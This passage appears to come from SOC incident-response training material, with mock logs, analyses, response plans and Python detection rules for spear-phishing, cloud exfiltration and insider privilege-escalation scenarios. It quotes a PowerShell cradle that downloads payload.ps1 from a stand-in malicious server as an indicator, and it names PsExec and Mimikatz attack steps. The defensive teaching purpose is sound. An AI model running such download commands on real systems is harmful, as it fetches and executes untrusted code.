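    for line in text.strip().splitlines():
        cradle = extract_cradle(line)
        if cradle:
            cradles.append(cradle)
        m = OUTBOUND.search(line)
        if m:
            outbound.append({"ts": when(line), "ip": m["ip"], "dst": m["dst"], "port": int(m["port"])})
    by_url = defaultdict(list)
    for c in cradles:
        by_url[c["url"]].append(c)
    campaigns = {}
    for url, hits in by_url.items():
        hits.sort(key=lambda c: c["ts"])
        campaigns[url] = {
            "hosts": [c["ip"] for c in hits],
            "patient_zero": hits[0]["user"],  # earliest cradle execution
            "spread_s": (hits[-1]["ts"] - hits[0]["ts"]).total_seconds(),
            "all_wrapped_in_iex": all(c["wrapped_in_iex"] for c in hits),
        }
    iocs = {
        "domains": sorted({c["domain"] for c in cradles}),
        "urls": sorted(by_url),
        "drop_paths": sorted({c["outfile"] for c in cradles if c["outfile"]}),
        "external_ips": sorted({o["dst"] for o in outbound}),
    }
    return {"campaigns": campaigns, "iocs": iocs,
            "hosts_with_external_contact": sorted({o["ip"] for o in outbound})}


if __name__ == "__main__":
    result = analyse(SIEM)
    for url, c in result["campaigns"].items():
        print(f"{url}: {len(c['hosts'])} hosts, patient zero {c['patient_zero']}, spread {c['spread_s']:.0f}s")
    print("IOCs:", result["iocs"])
```

Two machines pulling the identical payload URL to the identical drop path within three minutes is what distinguishes a campaign from an isolated infection, and the resulting IOC set is the input for the containment blocks and the scoping step in the response plan.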

INCIDENT RESPONSE PLAN

1. Containment

• Isolate Compromised Systems: Disconnect "izzuddin," "mary.jones," and "iffah" machines from the network.
• Block Malicious Domains: Block outbound traffic to maliciousserver.com at the
firewall level.
• Disable User Accounts: Temporarily disable "izzuddin," "mary.jones," and "iffah"
accounts in Active Directory.

2. Eradication

• Remove Malware: Run full antivirus scans on the infected machines and remove
the malware (payload.ps1).
• Check for Persistence: Inspect the registry, scheduled tasks and autorun entries
for any persistence mechanisms that the attacker might have left behind.
• Patch Vulnerabilities: Ensure that the systems are patched to close any
vulnerabilities that may have been exploited.

3. Recovery

• Restore Systems: Restore the affected machines from clean backups.
• Monitor for Re-infection: Set up monitoring for any signs of re-infection or further
lateral movement in the network.

4. Post-Incident Actions

• Forensic Analysis: Perform a detailed investigation on the external IP (203.0.113.10) to gather more information about the attacker.
• Update Email Filtering: Enhance email filtering rules to prevent similar spear-
phishing emails from reaching users in the future.
• Review Security Policies: Review and update security policies related to macro
use in emails and document attachments.
• Employee Awareness: Conduct phishing awareness training to help employees
identify similar attacks in the future.

DISCUSSION QUESTIONS AND ANSWERS

1. What were the key indicators of compromise (IOCs) that pointed to a spear-phishing
attack?

• Email Headers and Attachments: The incoming email from an external address
([email protected]) with the subject "Invoice for Q4 - Immediate
Payment Required" raised suspicion, especially since it was sent to multiple
finance department employees.
• Attachment Behavior: The attached document, Invoice_Q4.docx, contained
embedded macros. The fact that users opened the attachment and enabled macros
is a common tactic used in spear-phishing attacks to execute malicious code.
• PowerShell Execution: The logs show that both users executed PowerShell
commands (Invoke-WebRequest -Uri http://maliciousserver.com/payload.ps1) to
download a malicious payload, a key indicator of a successful phishing attempt.
• Outbound Network Traffic: The outbound connection to an external IP
(203.0.113.10) for downloading a payload indicates malicious activity, as this IP
should not be associated with legitimate business traffic.

2. How would you confirm whether the attack was initiated by a targeted or random
spear-phishing campaign?

• Review Email Content: Targeted spear-phishing campaigns often involve highly
personalised emails that reference specific details about the victim, such as job
role, projects or internal processes. If the email appears generic (like the "Invoice
for Q4" subject), it may indicate a random campaign.
• Investigate Additional Recipients: Check if other employees, especially those with
similar roles or in the same department (Finance), also received similar emails. If
the email was broadly sent, it may suggest a random campaign.
• Examine Historical Patterns: If the company has experienced similar phishing
attempts in the past that targeted specific roles or departments (e.g., Finance, HR),
it may suggest a more targeted approach.
• Threat Intelligence: Collaborate with external threat intelligence sources or use
services like VirusTotal to determine whether the sender's domain or payload IP
address has been seen in previous attacks, which can provide insight into the
nature of the campaign.

3. What steps can be taken to prevent PowerShell-based attacks in the future?

• Restrict PowerShell Execution Policies: Implement stricter PowerShell execution
policies on endpoints (e.g., Set-ExecutionPolicy Restricted) to prevent unauthorised
script execution.
• PowerShell Logging and Auditing: Enable PowerShell script block logging and
transcription in Windows Event Logs to capture detailed activity. This can help
detect malicious scripts that are executed on the system.
• AppLocker or Device Guard: Use AppLocker or Windows Defender Device Guard
to block the execution of PowerShell scripts or limit execution to only trusted
sources or specific administrators.
• Endpoint Detection and Response (EDR): Configure EDR solutions to flag
suspicious PowerShell commands, particularly those that download or execute
files from external sources.
• Network Segmentation: Ensure that systems running sensitive tasks (like file
servers or administrative workstations) are segmented from regular users' systems
to prevent lateral movement if PowerShell scripts are run on non-administrative
workstations.
• User Awareness Training: Train employees on recognising and avoiding malicious
attachments, especially those that prompt users to enable macros or run scripts.

4. How would you handle the forensic investigation of external IP addresses used in
the attack?

• IP Reputation Lookup: Use threat intelligence platforms or services like VirusTotal
or Cisco Talos to check the reputation of the external IP address (203.0.113.10).
This could identify whether the IP is associated with known malicious activity.
• Traffic Analysis: Review the outbound traffic to the IP address in detail (e.g.,
timestamps, size of data packets, protocols) to understand the nature of
communication between the compromised systems and the external attacker.
• Track Data Transfer: Investigate what data was transferred from the compromised
systems to the malicious server by analysing the file contents (e.g., whether
sensitive data was exfiltrated) and network logs (e.g., traffic patterns, protocols
used).
• Triage Other Affected Systems: Identify any other systems that may have
communicated with the same external IP to assess the full scope of the attack.
• Engage Law Enforcement (if necessary): If the external IP is part of a larger known
criminal infrastructure, consider engaging law enforcement or relevant cybercrime
authorities for further investigation.

5. What role does email filtering and endpoint protection play in preventing such
attacks and how can they be improved?

• Email Filtering:
Email filtering plays a crucial role in identifying and blocking spear-phishing emails
before they reach end users. Filters can analyse:
o Attachments: Blocking or sandboxing potentially dangerous attachments
(e.g., .docx, .xlsm, .exe, etc.).
o Links: Flagging URLs with suspicious or blacklisted domains.
o Heuristic Analysis: Identifying phishing attempts based on email content,
sender reputation and behavior (e.g., spoofing of internal company email
addresses).

To improve email filtering:

o Use advanced filtering tools that analyse email body content for suspicious
patterns.
o Implement DMARC, SPF and DKIM to ensure emails claiming to come from
internal domains are verified.
o Enable automated sandboxing of attachments before delivery to users.
• Endpoint Protection:
Endpoint protection (EDR solutions) detects and prevents malicious activities on
user machines. In this case, EDR could detect the malicious PowerShell script
execution, isolate the infected machine and block communication with the external
server.

To improve endpoint protection:

o Regularly update signature-based antivirus tools to catch new malware.
o Enable behavioral analysis features to identify abnormal activity such as
suspicious script execution or lateral movement.
o Employ endpoint isolation capabilities that automatically disconnect
infected devices from the network to prevent further spread.

SCENARIO 4: INTERNAL DATA EXFILTRATION VIA CLOUD STORAGE

Scenario: A security analyst at a company notices unusual behavior from an internal user.
The user is an employee in the Legal department who has access to sensitive internal
documents. The user, however, starts uploading several large files to a personal cloud
storage account, which is outside the company's approved cloud services.

The analyst flags this activity as potentially malicious and escalates the issue for further
investigation.

LOGS

1. Firewall Logs

Jan 17 14:20:12 fw1 192.168.100.15 [OUTBOUND] - 203.0.113.45:443 - HTTPS traffic to personal cloud storage (cloudservice.com)
Jan 17 14:22:47 fw1 192.168.100.15 [OUTBOUND] - 203.0.113.45:443 - HTTPS traffic to personal cloud storage (cloudservice.com)
Jan 17 14:30:11 fw1 192.168.100.15 [OUTBOUND] - 203.0.113.45:443 - HTTPS traffic to personal cloud storage (cloudservice.com)
Jan 17 14:45:38 fw1 192.168.100.15 [OUTBOUND] - 203.0.113.45:443 - HTTPS traffic to personal cloud storage (cloudservice.com)

2. User Activity Logs (File System Activity):

Jan 17 14:10:52 user-pc1 192.168.100.15 User "izzmier" accessed file "Legal_Sensitive_Document_01.docx"
Jan 17 14:12:30 user-pc1 192.168.100.15 User "izzmier" copied "Legal_Sensitive_Document_01.docx" to "E:\Temp\upload"
Jan 17 14:15:02 user-pc1 192.168.100.15 User "izzmier" accessed file "Legal_Sensitive_Document_02.docx"
Jan 17 14:16:47 user-pc1 192.168.100.15 User "izzmier" copied "Legal_Sensitive_Document_02.docx" to "E:\Temp\upload"
Jan 17 14:20:09 user-pc1 192.168.100.15 User "izzmier" uploaded file "Legal_Sensitive_Document_01.docx" to cloud storage account (cloudservice.com)
Jan 17 14:20:43 user-pc1 192.168.100.15 User "izzmier" uploaded file "Legal_Sensitive_Document_02.docx" to cloud storage account (cloudservice.com)
Jan 17 14:30:05 user-pc1 192.168.100.15 User "izzmier" uploaded file "Legal_Sensitive_Document_03.docx" to cloud storage account (cloudservice.com)
Jan 17 14:35:12 user-pc1 192.168.100.15 User "izzmier" uploaded file "Legal_Sensitive_Document_04.docx" to cloud storage account (cloudservice.com)
Jan 17 14:40:50 user-pc1 192.168.100.15 User "izzmier" uploaded file "Legal_Sensitive_Document_05.docx" to cloud storage account (cloudservice.com)

3. Cloud Storage Access Logs:

Jan 17 14:20:09 cloudservice.com 203.0.113.45 File "Legal_Sensitive_Document_01.docx" uploaded by user "izzmier"
Jan 17 14:20:43 cloudservice.com 203.0.113.45 File "Legal_Sensitive_Document_02.docx" uploaded by user "izzmier"
Jan 17 14:30:05 cloudservice.com 203.0.113.45 File "Legal_Sensitive_Document_03.docx" uploaded by user "izzmier"
Jan 17 14:35:12 cloudservice.com 203.0.113.45 File "Legal_Sensitive_Document_04.docx" uploaded by user "izzmier"
Jan 17 14:40:50 cloudservice.com 203.0.113.45 File "Legal_Sensitive_Document_05.docx" uploaded by user "izzmier"

4. Security Information and Event Management (SIEM) Logs:

Jan 17 14:21:30 siem1 src=192.168.100.15 dest=203.0.113.45 protocol=HTTPS event=outbound_data_transfer
Jan 17 14:31:12 siem1 src=192.168.100.15 dest=203.0.113.45 protocol=HTTPS event=outbound_data_transfer
Jan 17 14:45:22 siem1 src=192.168.100.15 dest=203.0.113.45 protocol=HTTPS event=outbound_data_transfer
Jan 17 14:55:01 siem1 src=192.168.100.15 dest=203.0.113.45 protocol=HTTPS event=outbound_data_transfer

ANALYSIS

1. Detection of Suspicious Activity:

• Unusual User Behavior: The user, izzmier, is part of the Legal department and has
access to sensitive documents, including Legal_Sensitive_Document_01.docx
through Legal_Sensitive_Document_05.docx. However, the user is uploading these
files to an external cloud storage provider, which is not sanctioned by the company.
• File System Activity: The logs show that the user copied multiple sensitive legal
documents from internal systems (e.g., Legal_Sensitive_Document_01.docx) to a
temporary folder (E:\Temp\upload). Subsequently, the files are uploaded to a
personal cloud storage service (cloudservice.com), which is unusual given the
sensitive nature of the documents.
• Network Traffic: The firewall logs show repeated outbound HTTPS sessions from
192.168.100.15 to 203.0.113.45 (cloudservice.com) whose timestamps line up with
the upload events. The firewall cannot see the file contents inside TLS; what
makes the traffic anomalous is the destination (a personal storage service) and
the volume and timing of the sessions.
• Cloud Storage Access Logs: The cloud storage provider’s access logs show the
specific files uploaded by the user at regular intervals, indicating potential
exfiltration over a 20-minute period.

2. Indicators of Compromise (IOCs):

• Unsanctioned Destination: 203.0.113.45 (cloudservice.com) is a personal cloud
storage service, not an approved business destination for company data.
• Sensitive File Uploads: Five documents from the Legal department, named as
sensitive and containing proprietary legal content, were uploaded.
• Burst of Uploads: Five large files in roughly 20 minutes (14:20 to 14:40),
preceded by copies into a staging folder, is the collection-then-exfiltration
pattern rather than an accidental share.

RESPONSE ACTIONS

1. Immediate Containment:

• Account Lockdown: Disable izzmier's account and revoke existing sessions and
tokens (VPN, SSO, mailbox) so that cached credentials cannot be used to continue
the uploads.
• Cloud Storage Block: Block cloudservice.com (and 203.0.113.45) at the proxy or
firewall to stop further uploads to that destination.
• Endpoint Isolation: Contain user-pc1 through the EDR network-isolation function
rather than powering it off, so that the staging folder E:\Temp\upload, browser
history and memory remain available as evidence.

2. Investigation:

• Examine the Files: Establish the exact content and classification of the five
uploaded documents (from the file server's master copies and the staging copies
in E:\Temp\upload) to size the exposure and decide whether client, regulatory
or legal notification is required.
• Review Historical Access Logs: Check proxy and firewall history for earlier
connections from 192.168.100.15 to cloudservice.com or other personal storage
services, and for uploads from the user's other devices. Account for every
transfer: the SIEM records an outbound transfer at 14:55:01 that has no matching
entry in the user activity or cloud access logs, so the five named files may not
be the complete set.
• Interview the User: Conduct an interview with the user (izzmier), together with
HR and Legal, to determine whether the actions were intentional, negligent or the
result of a compromise (e.g., credential theft). Preserve evidence before the
interview; a user who is tipped off may delete the staging folder or empty the
cloud account.

3. Long-Term Mitigation:

• Revoke Access: If the activity is confirmed as malicious, permanently revoke the
user's access to sensitive systems and reset all access credentials. Review access
controls for other users who may have similar permissions.
• Review Cloud Service Access Policies: Update and enforce strict policies to block
the use of non-approved cloud storage services for uploading sensitive data.
Implement Data Loss Prevention (DLP) at the endpoint and at the web proxy or CASB
to block unauthorised uploads; because the uploads travel over HTTPS, proxy-side
DLP needs TLS inspection for the destinations it is expected to cover.
• Implement Network Monitoring: Strengthen network monitoring to detect any
future data exfiltration attempts. This can include alerting for high-volume data
transfers to non-approved external destinations.
• Educate Employees: Conduct training sessions to ensure all employees are aware
of the company’s data protection policies and the consequences of unauthorised
data transfers.
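Both the detection described in the Analysis section (a file copied to E:\Temp\upload, then uploaded to a personal service) and the alerting on transfers to non-approved destinations called for under Network Monitoring can be expressed as one correlation rule. The following is an added example written for this page, not code from the exercise: it parses user activity lines in the format shown above, ignores uploads to an approved allowlist, and raises one alert per user and destination, marking it high when several sensitive files or a staged-then-uploaded file is involved. The allowlist, the name-based sensitivity classifier and the extra lines for users bob and carol are constructed assumptions.

```python
"""Added example (not from the exercise): correlating host file-activity log lines
with upload events to flag sensitive data staged and pushed to an unsanctioned
cloud service. Assumptions: the line formats mirror the exercise's user activity
log; the approved-domain list, the name-based classifier and the extra bob/carol
lines are constructed; syslog timestamps carry no year."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<ip>\S+) '
    r'User "(?P<user>[^"]+)" (?P<rest>.*)$'
)
COPY_RE = re.compile(r'copied "(?P<file>[^"]+)" to "(?P<dest>[^"]+)"')
UPLOAD_RE = re.compile(
    r'uploaded file "(?P<file>[^"]+)" to cloud storage account \((?P<domain>[^)]+)\)'
)
# Naming-based sensitivity classifier (assumption; a real DLP uses content labels).
SENSITIVE_RE = re.compile(r"sensitive|confidential|legal_", re.IGNORECASE)


def parse_ts(text: str) -> datetime:
    # Syslog omits the year; %b %d parses to 1900, which is fine for ordering and deltas.
    return datetime.strptime(" ".join(text.split()), "%b %d %H:%M:%S")


def detect_exfiltration(lines, approved_domains, window_minutes=30, threshold=3):
    """Return one alert per (user, unsanctioned domain) seen uploading files.

    An upload counts as 'staged' when the same user copied the same file to some
    other location no more than window_minutes earlier; that copy-then-upload
    pattern is what separates deliberate collection from an isolated share."""
    approved = {d.lower() for d in approved_domains}
    window = timedelta(minutes=window_minutes)
    staged = {}                  # (user, file) -> (copy time, staging path)
    uploads = defaultdict(list)  # (user, domain) -> [(ts, host, file)]

    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = parse_ts(m["ts"])
        c = COPY_RE.search(m["rest"])
        if c:
            staged[(m["user"], c["file"])] = (ts, c["dest"])
            continue
        u = UPLOAD_RE.search(m["rest"])
        if u and u["domain"].lower() not in approved:
            uploads[(m["user"], u["domain"].lower())].append((ts, m["host"], u["file"]))

    alerts = []
    for (user, domain), events in sorted(uploads.items()):
        events.sort()
        files = [f for _, _, f in events]
        staged_files = []
        for ts, _, f in events:
            hit = staged.get((user, f))
            if hit and timedelta(0) <= ts - hit[0] <= window:
                staged_files.append(f)
        sensitive = [f for f in files if SENSITIVE_RE.search(f)]
        high = len(sensitive) >= threshold or (bool(staged_files) and bool(sensitive))
        alerts.append({
            "user": user,
            "host": events[0][1],
            "domain": domain,
            "first_seen": events[0][0].strftime("%b %d %H:%M:%S"),
            "last_seen": events[-1][0].strftime("%b %d %H:%M:%S"),
            "files": files,
            "staged_files": staged_files,
            "sensitive_count": len(sensitive),
            "severity": "high" if high else "medium",
        })
    return alerts


# Constructed sample log: the exercise's izzmier activity plus an approved-service
# upload (must not alert) and a single personal upload by another user (medium).
SAMPLE_LOG = """\
Jan 17 14:10:52 user-pc1 192.168.100.15 User "izzmier" accessed file "Legal_Sensitive_Document_01.docx"
Jan 17 14:12:30 user-pc1 192.168.100.15 User "izzmier" copied "Legal_Sensitive_Document_01.docx" to "E:\\Temp\\upload"
Jan 17 14:16:47 user-pc1 192.168.100.15 User "izzmier" copied "Legal_Sensitive_Document_02.docx" to "E:\\Temp\\upload"
Jan 17 14:20:09 user-pc1 192.168.100.15 User "izzmier" uploaded file "Legal_Sensitive_Document_01.docx" to cloud storage account (cloudservice.com)
Jan 17 14:20:43 user-pc1 192.168.100.15 User "izzmier" uploaded file "Legal_Sensitive_Document_02.docx" to cloud storage account (cloudservice.com)
Jan 17 14:30:05 user-pc1 192.168.100.15 User "izzmier" uploaded file "Legal_Sensitive_Document_03.docx" to cloud storage account (cloudservice.com)
Jan 17 14:35:12 user-pc1 192.168.100.15 User "izzmier" uploaded file "Legal_Sensitive_Document_04.docx" to cloud storage account (cloudservice.com)
Jan 17 14:40:50 user-pc1 192.168.100.15 User "izzmier" uploaded file "Legal_Sensitive_Document_05.docx" to cloud storage account (cloudservice.com)
Jan 17 14:42:00 user-pc7 192.168.100.22 User "bob" uploaded file "Contract_Template.docx" to cloud storage account (sharepoint.example.com)
Jan 17 14:50:10 user-pc9 192.168.100.31 User "carol" uploaded file "holiday_photos.zip" to cloud storage account (cloudservice.com)
"""
APPROVED_CLOUD = ["sharepoint.example.com"]  # constructed allowlist

if __name__ == "__main__":
    for alert in detect_exfiltration(SAMPLE_LOG.splitlines(), APPROVED_CLOUD):
        print(alert)
```

On the sample, izzmier produces a high-severity alert listing all five documents with the first two marked as staged, carol's single personal upload is medium, and bob's upload to the approved service is not reported at all. The allowlist is what keeps the rule from drowning in legitimate SharePoint or OneDrive traffic; the staging check is what tells the analyst this was collected, not clicked by accident.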

DISCUSSION QUESTIONS AND ANSWERS

1. What were the key indicators of compromise (IOCs) in this scenario?

• Suspicious IP Address: Outbound traffic from the internal user's machine to
203.0.113.45, an unauthorised cloud storage service.
• Large File Uploads: The user uploaded several large, sensitive files to a personal
cloud storage service.
• Unusual File System Activity: The user copied multiple sensitive documents to a
temporary directory and then uploaded them to an external service, which is a red
flag for data exfiltration.

2. How can we prevent unauthorised cloud storage use in the future?

• Block Unauthorised Cloud Services: Use a network firewall or web filtering
solution to block access to non-approved cloud storage services.
• Data Loss Prevention (DLP): Implement DLP solutions to monitor and prevent
unauthorised uploads of sensitive files to cloud services.
• User Training and Awareness: Regularly train employees on data protection
policies, including acceptable use of cloud storage services.
• Endpoint Security: Implement endpoint security solutions that detect and block
the use of unauthorised applications, including cloud storage software.

SCENARIO 5: INSIDER THREAT - UNAUTHORISED PRIVILEGE ESCALATION
AND LATERAL MOVEMENT

Scenario: An analyst in the Security Operations Center (SOC) receives an alert of
abnormal privileged account activity. The alert indicates that a user from the IT
department, alice.jones, has gained unauthorised access to a critical server and escalated
privileges to SYSTEM-level access, which is outside the scope of her role.

The user then proceeds to explore other systems and attempt lateral movement across the
internal network. The situation is flagged for investigation to determine if this is an insider
threat, potential privilege misuse or a compromised account.

LOGS

1. Active Directory Logs

Jan 17 10:00:02 ad01 192.168.100.21 User "alice.jones" logged in to "Server-DC01" (Domain Controller) with account "alice.jones".
Jan 17 10:05:45 ad01 192.168.100.21 User "alice.jones" granted elevated privileges (Local Administrator) on "Server-DC01".
Jan 17 10:06:32 ad01 192.168.100.21 User "alice.jones" logged in to "Server-DC01" as SYSTEM (via PsExec).
Jan 17 10:20:22 ad01 192.168.100.21 User "alice.jones" logged in to "Server-DB01" (Database Server) from "Server-DC01" via RDP (Remote Desktop Protocol).
Jan 17 10:30:12 ad01 192.168.100.21 User "alice.jones" attempted to escalate privileges on "Server-DB01" via local privilege escalation tool (e.g., Mimikatz).
Jan 17 10:35:56 ad01 192.168.100.21 User "alice.jones" logged in to "Server-WEB01" (Web Server) from "Server-DC01" via RDP.
Jan 17 10:50:05 ad01 192.168.100.21 User "alice.jones" logged out from "Server-WEB01".
Jan 17 10:55:15 ad01 192.168.100.21 User "alice.jones" logged out from "Server-DB01".

2. Firewall Logs

Jan 17 10:15:22 fw1 192.168.100.21 [INBOUND] - 192.168.100.21:3389 - RDP connection to "Server-DB01" established.
Jan 17 10:35:56 fw1 192.168.100.21 [INBOUND] - 192.168.100.21:3389 - RDP connection to "Server-WEB01" established.
Jan 17 10:45:01 fw1 192.168.100.21 [OUTBOUND] - 192.168.100.21:53 - DNS query for "external.com" (Suspicious domain resolution).

3. SIEM Logs

Jan 17 10:00:02 siem1 src=192.168.100.21 dest=192.168.100.101 protocol=RDP event=unauthorised_privileged_access
Jan 17 10:05:45 siem1 src=192.168.100.21 dest=192.168.100.101 event=privilege_escalation_detected
Jan 17 10:06:32 siem1 src=192.168.100.21 dest=192.168.100.101 event=unauthorised_login_as_SYSTEM
Jan 17 10:20:22 siem1 src=192.168.100.21 dest=192.168.100.201 protocol=RDP event=lateral_movement_attempt
Jan 17 10:30:12 siem1 src=192.168.100.21 dest=192.168.100.201 event=privilege_escalation_attempt
Jan 17 10:35:56 siem1 src=192.168.100.21 dest=192.168.100.301 protocol=RDP event=lateral_movement_attempt
Jan 17 10:45:01 siem1 src=192.168.100.21 dest=8.8.8.8 protocol=DNS event=suspicious_dns_query

4. Sysmon Logs (on Server-DC01)

Jan 17 10:06:32 sysmon1 192.168.100.21 Process "PsExec.exe" executed by user "alice.jones" with elevated privileges (SYSTEM).
Jan 17 10:10:45 sysmon1 192.168.100.21 Process "cmd.exe" executed by "alice.jones" with SYSTEM privileges.

ANALYSIS

1. Detection of Suspicious Activity:

• Privilege Escalation: The logs show that alice.jones, an IT department user,
logged into Server-DC01 (the domain controller) and was then granted local
administrator privileges on it. That grant is itself significant: a domain
controller has no separate local Administrators group, so administrative rights
on Server-DC01 are effectively domain-wide. Once an administrator, obtaining a
SYSTEM shell with PsExec (psexec -s) is trivial and is not a further technical
escalation; the real questions are who or what granted the privilege at 10:05:45,
through which mechanism, and why to an account outside that role. PsExec is a
legitimate administration tool, but its use here is unauthorised.
• Lateral Movement Attempts: After gaining SYSTEM access on the domain controller,
alice.jones connected to other critical servers (Server-DB01 and Server-WEB01)
via RDP. Note that the log sources disagree on the origin of those sessions: the
Active Directory log records them as coming from Server-DC01, while the firewall
and SIEM record the source as 192.168.100.21 (her workstation). Reconcile that
discrepancy from the target servers' own logon events (event 4624, logon type 10,
with the recorded source address) before the movement path goes into the report.
• Credential Theft Tooling: The attempt to run Mimikatz on Server-DB01 is another
red flag. Mimikatz is a credential-dumping tool rather than a privilege
escalation exploit; its presence means every credential cached on that server
should be treated as exposed.
• Suspicious DNS Query: The outbound DNS request for external.com was sent to
8.8.8.8, a public resolver, rather than to the internal DNS servers. The domain is
not part of the company's environment, and bypassing internal DNS is a common way
to avoid DNS logging and filtering, so this may be an attempt to reach an
external, potentially malicious, host.

2. Indicators of Compromise (IOCs):


• Suspicious Process Execution: The execution of PsExec.exe and cmd.exe with
SYSTEM privileges indicates an abuse of legitimate administrative tools for
malicious purposes.
• Lateral Movement: The RDP connections to Server-DB01 and Server-WEB01
without appropriate authorization are suspicious.
• Suspicious DNS Query: The DNS request to a non-recognised domain
(external.com) raises the possibility of data exfiltration or remote command-and-
control (C2) communication.
• Multiple Privilege Escalation Attempts: The attempted escalation of privileges
across multiple systems within a short time window suggests the user’s intent to
explore critical infrastructure.

RESPONSE ACTIONS

1. Immediate Containment:

• User Account Lockdown: Disable alice.jones's account immediately, reset its
password and terminate her active sessions on Server-DC01, Server-DB01 and
Server-WEB01 so that existing logons and Kerberos tickets cannot be reused.
• Network Isolation: Isolate Server-DB01 and Server-WEB01 from the network to
prevent further lateral movement and potential data exfiltration. Treat
Server-DC01 with more care: unplugging a domain controller breaks authentication
for everyone it serves and destroys volatile evidence, so capture memory and the
relevant event logs first and then contain it with the EDR isolation function,
which keeps the investigation channel open while cutting all other traffic.
• Restrict Remote Access: Block RDP access to sensitive servers to prevent any
further remote logins until the investigation is complete.

2. Investigation:

• Root Cause Analysis: Investigate the initial entry point. Was alice.jones's
account compromised, or did she exploit a vulnerability or a misconfigured
permission to gain administrator rights on Server-DC01? Establish who or what
granted the elevated privilege at 10:05:45, and examine her workstation
(192.168.100.21) for the tools used (e.g., PsExec, Mimikatz) and how they got
there.
• Forensic Analysis: Perform a forensic investigation on Server-DC01, Server-DB01
and Server-WEB01 to check for signs of data exfiltration or malicious actions.
SYSTEM-level access on a domain controller is sufficient to dump every domain
credential, so if there is any evidence that credential dumping ran on
Server-DC01 (a SYSTEM-level cmd.exe is recorded there at 10:10:45), assume the
domain's credentials, including krbtgt, are exposed and plan resets of all
privileged accounts and a double krbtgt reset as part of recovery.
• Check DNS Logs: Review DNS logs for any other suspicious activity, especially
queries for unknown external domains or queries sent to external resolvers such
as 8.8.8.8 that bypass internal DNS. Investigate whether any data was
exfiltrated to external.com.
• Review Historical Activity: Analyse previous login and access logs to check if
similar suspicious activities occurred in the past.

3. Long-Term Mitigation:

• Enforce Least Privilege: Ensure that privileged accounts are restricted based on
the principle of least privilege. Implement a policy to enforce strict controls over
administrative privileges.
• Monitor Privileged Access: Implement privileged access management (PAM) to
better control, monitor and audit privileged account activity.
• Network Segmentation: Apply stricter network segmentation and limit lateral
movement by restricting RDP and other remote administrative tools to only
necessary personnel.
• DNS Filtering: Implement DNS filtering to block access to malicious or suspicious
domains to prevent data exfiltration and communication with command-and-
control servers.

DISCUSSION QUESTIONS AND ANSWERS

1. What are the primary indicators of compromise in this scenario?

• Unauthorised Privilege Escalation: Obtaining a SYSTEM shell with PsExec on a
domain controller, and then attempting to harvest credentials with Mimikatz on
Server-DB01, outside the scope of the user's role, is a clear indicator of
compromise.
• Lateral Movement: Unauthorised RDP connections to Server-DB01 and Server-
WEB01 suggest malicious intent to explore further systems in the network.
• Suspicious DNS Query: The DNS request to external.com raises concerns about
potential data exfiltration or C2 activity.

2. How can you mitigate the risk of privilege escalation and lateral movement?

• Use Least Privilege: Enforce strict least-privilege access control to ensure users
only have the permissions necessary for their role.
• Monitor Privileged Accounts: Use tools like Privileged Access Management (PAM)
to monitor, log and audit the use of privileged accounts.
• Network Segmentation: Isolate critical servers and apply network segmentation to
limit the spread of an attack if lateral movement occurs.

3. What additional tools or techniques could help detect and prevent this type of
attack?

• Endpoint Detection and Response (EDR): EDR tools can detect unauthorised use
of tools like PsExec and privilege escalation attempts in real time.
• SIEM: Advanced correlation rules in a SIEM can identify abnormal login patterns,
privilege escalation events and lateral movement.
• DNS Security: Using DNS filtering solutions can help prevent communication with
known malicious domains and reduce the risk of C2 traffic.
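The SIEM correlation rule mentioned in question 3, and the chain the Analysis section pieced together by hand (privilege escalation, RDP to several servers, then an external DNS lookup from the same source), can be implemented as a forward-looking window over key=value events. The following is an added example, not part of the original exercise: it maps event names to stages, anchors on the first privilege escalation per source and alerts when lateral movement reaches at least two distinct hosts within the window, escalating to critical when external communication follows. The stage mapping, the window and threshold values, and the sample lines (which mirror the exercise's SIEM log and add two benign sources with illustrative addresses) are constructed assumptions.

```python
"""Added example (not from the exercise): a SIEM-style correlation rule that links
privilege escalation, lateral movement to multiple hosts and an external lookup
from the same source into one attack-chain alert. Assumptions: the key=value line
format mirrors the exercise's SIEM log; the event-to-stage mapping, window and
threshold, and the sample lines (including two benign sources) are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

KV_RE = re.compile(r"(\w+)=(\S+)")
TS_RE = re.compile(r"^(\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) (\S+) (.*)$")

# Which kill-chain stage each SIEM event name represents (assumption).
STAGE_OF = {
    "unauthorised_privileged_access": "initial_access",
    "privilege_escalation_detected": "privilege_escalation",
    "privilege_escalation_attempt": "privilege_escalation",
    "unauthorised_login_as_SYSTEM": "privilege_escalation",
    "lateral_movement_attempt": "lateral_movement",
    "suspicious_dns_query": "external_comms",
}


def parse_event(line):
    """Return (timestamp, fields) for one SIEM line, or None if it does not parse."""
    m = TS_RE.match(line.strip())
    if not m:
        return None
    # Syslog omits the year; %b %d parses to 1900, fine for ordering and deltas.
    ts = datetime.strptime(" ".join(m.group(1).split()), "%b %d %H:%M:%S")
    fields = dict(KV_RE.findall(m.group(3)))
    fields["stage"] = STAGE_OF.get(fields.get("event"), "other")
    return ts, fields


def correlate_attack_chain(lines, window_minutes=60, min_targets=2):
    """For each source, anchor on its first privilege_escalation event and look
    forward window_minutes. If lateral movement reaches at least min_targets
    distinct hosts, emit an alert; it becomes critical when the chain also
    contains external communication (possible C2 or exfiltration)."""
    window = timedelta(minutes=window_minutes)
    by_src = defaultdict(list)
    for line in lines:
        parsed = parse_event(line)
        if parsed and "src" in parsed[1]:
            by_src[parsed[1]["src"]].append(parsed)

    alerts = []
    for src, events in sorted(by_src.items()):
        events.sort(key=lambda e: e[0])
        anchors = [ts for ts, f in events if f["stage"] == "privilege_escalation"]
        if not anchors:
            continue  # no escalation: routine admin RDP alone does not alert
        start = anchors[0]
        chain = [(ts, f) for ts, f in events if start <= ts <= start + window]
        targets = sorted({f["dest"] for _, f in chain
                          if f["stage"] == "lateral_movement" and "dest" in f})
        if len(targets) < min_targets:
            continue
        stages = []
        for _, f in chain:  # distinct stages in the order they were first seen
            if f["stage"] != "other" and f["stage"] not in stages:
                stages.append(f["stage"])
        external = "external_comms" in stages
        alerts.append({
            "src": src,
            "anchor": start.strftime("%b %d %H:%M:%S"),
            "stages": stages,
            "lateral_targets": targets,
            "external_comms": external,
            "severity": "critical" if external else "high",
            "event_count": len(chain),
        })
    return alerts


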